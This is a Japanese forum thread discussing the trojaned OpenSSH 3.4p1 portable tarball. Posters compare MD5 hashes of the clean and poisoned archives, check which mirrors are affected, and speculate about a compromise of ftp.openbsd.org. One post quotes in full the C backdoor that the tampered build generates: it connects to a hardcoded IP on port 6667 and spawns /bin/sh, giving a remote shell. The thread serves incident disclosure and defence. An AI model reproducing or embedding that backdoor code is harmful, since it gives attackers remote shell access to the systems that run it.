SSH その2

portable版3.4p1にトロイの木馬ですか。。((;ﾟдﾟ))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>4
某サーバの6667につないで/bin/shしてるよーな、そんな感じ。
＜トロイ

>>4
詳細＆ソースぷりーず

>>6
だいじょぶなやつ
837668 bytes
MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

ダメなやつ
840574 bytes
MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

せっかくだからageときましょ

>>7
ダメなやつってopenssh.comが配布してたの?
それともmirrorのふりしてニセモノつかませてたサイトがあったとか?

>>9
さっき、マスターサイトから取得したら、ダメファイルだたよ…。
おそらく出回ってるミラーも、現在は危険でしょう。

いつごろからダメファイル設置されていたんでしょう？

http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security

参考までに、ビルド時に生成されて実行されるコード:

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <setjmp.h>
jmp_buf env;
int s;
char *i_val = "\x2f\x62\x69\x6e\x2f\x73\x68";
void sig(int sig){
close(s);
sleep(3600);
longjmp(env, 0);
} int main() {
int x;
char c, *a[2];
struct sockaddr_in sa;
struct sigaction act;
switch (fork()) {
case 0:
break;
default:
exit(0);
} close(0);
close(1);
close(2);
memset(&act, 0, sizeof(act));
act.sa_handler = sig;
sigaction(SIGALRM, &act, NULL);

do {
setjmp(env);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1))
exit(1);
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6667);
sa.sin_addr.s_addr = inet_addr("203.62.158.32");
alarm(10);
if (connect(s, (struct sockaddr *) & sa, sizeof(sa)) == (-1))
exit(1);
if ((x = read(s, &c, 1)) == (-1)) {
exit(1);
} else if (x == 1) {
switch (c) {
case 'A':
exit(0);
case 'D':
alarm(0);
dup2(s, 0);
dup2(s, 1);
dup2(s, 2);
a[0] = i_val;
a[1] = NULL;
execve(a[0], a, NULL);
break;
case 'M':
alarm(0);
sig(0);
break;
default:
}
} else {
exit(0);
}
} while (1);
}

i_val はすなわち "/bin/sh" ね。

ftp.u-aizu.ac.jp でダメファイルを確保しますた。
Ring はどうよ?

ring は OpenSSH のミラーしてないみたい。
うちでは /usr/ports/distfiles/ にだいじょうぶなやつがあったんで、
ftp://ftp.freebsd.org/pub/FreeBSD/ports/distfiles/ を調べたが、
ftp> dir openssh*
150 Opening ASCII mode data connection for '/bin/ls'.
-rw-r--r-- 1 1006 1006 330665 May 1 2001 openssh-2.9.tgz
-rw-r--r-- 1 1006 1006 662590 Jun 17 2001 openssh-2.9p2.tar.gz
-rw-r--r-- 1 1006 1006 363849 Nov 14 2001 openssh-3.0.1.tgz
-rw-r--r-- 1 1006 1006 780980 Nov 15 2001 openssh-3.0.1p1.tar.gz
-rw-r--r-- 1 1006 1006 364230 Mar 29 04:51 openssh-3.0.2.tgz
-rw-r--r-- 1 1006 1006 781092 Mar 29 04:51 openssh-3.0.2p1.tar.gz
-rw-r--r-- 1 1006 1006 9071 May 10 06:47 openssh-3.1-adv.token.patch
-rw-r--r-- 1 1006 1006 367903 Mar 6 00:43 openssh-3.1.tgz
-rw-r--r-- 1 1006 1006 9203 May 10 06:47 openssh-3.1p1-adv.token.patch
-rw-r--r-- 1 1006 1006 803104 Mar 7 02:41 openssh-3.1p1.tar.gz
226 Transfer complete.
残念、まだミラーされてなかった模様。

ftp://ftp.ring.gr.jp/pub/OpenBSD/OpenSSH/portable/

ここのは正常だったよ。

ring でも /pub/OpenBSD/OpenSSH/portable/ にあると思いますが、
毒入りかどうかは未確認(たぶんまだかな)。
すでに毒がまわっている OpenBSD のミラーもいくつかあるようです。

ftp.u-aizu.ac.jp には大丈夫な奴とダメな奴の
両方があるみたいだね。ダメファイルは多分

/pub/net/security/ssh/openssh/portable

の方。

>>12
これはOpenBSDでコンパイルするときがヤバイってこと?

see http://www.mavetju.org/weblog/weblog.php

>>19
いくつかの Ring サーバで /pub/OpenBSD/OpenSSH/portable のを
調べたけど大丈夫だった

Ring サーバって OpenBSD 自体が無いところもいくつかあるね。
近い ring.ocn.ad.jp には無かったよ。(´･ω･`)ｼｮﾎﾞｰﾝ

bf-test.cそのものは単にソース吐いてるだけか...

で，この原因はftp.openbsd.orgがcrackされたということなの？

>>26
実は Theo たんが…

おまいらportable版なぞ使わずOpenBSDを使え! っすか? (((；ﾟДﾟ))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

>>26

たぶんそう。
てことは、ssh だけじゃなくて、OpenBSD 本体の方も、書換えが
行なわれてないか調べる必要があるわけだが...

こういう時って、ftp.openbsd.orgの中身は全て信頼できないものと見なさな
いと危険だよね。
CVSリポジトリはTheoの手元にあるみたいだから大丈夫かな。

misc@に流れたAdvisoryのapplication/pgp-signatureがdemimeされていてちょっとワラタ

> CVSリポジトリはTheoの手元にあるみたいだから大丈夫かな。

その筈なんだが、もし ftp.openbsd.org で root も盗られていて、しかも
ftp.openbsd.org と cvs.openbsd.org で共通にアカウントを持つ人間がいた
りすると、結構やばい。
この前の monkey.org の件でも、同じ心配があるな。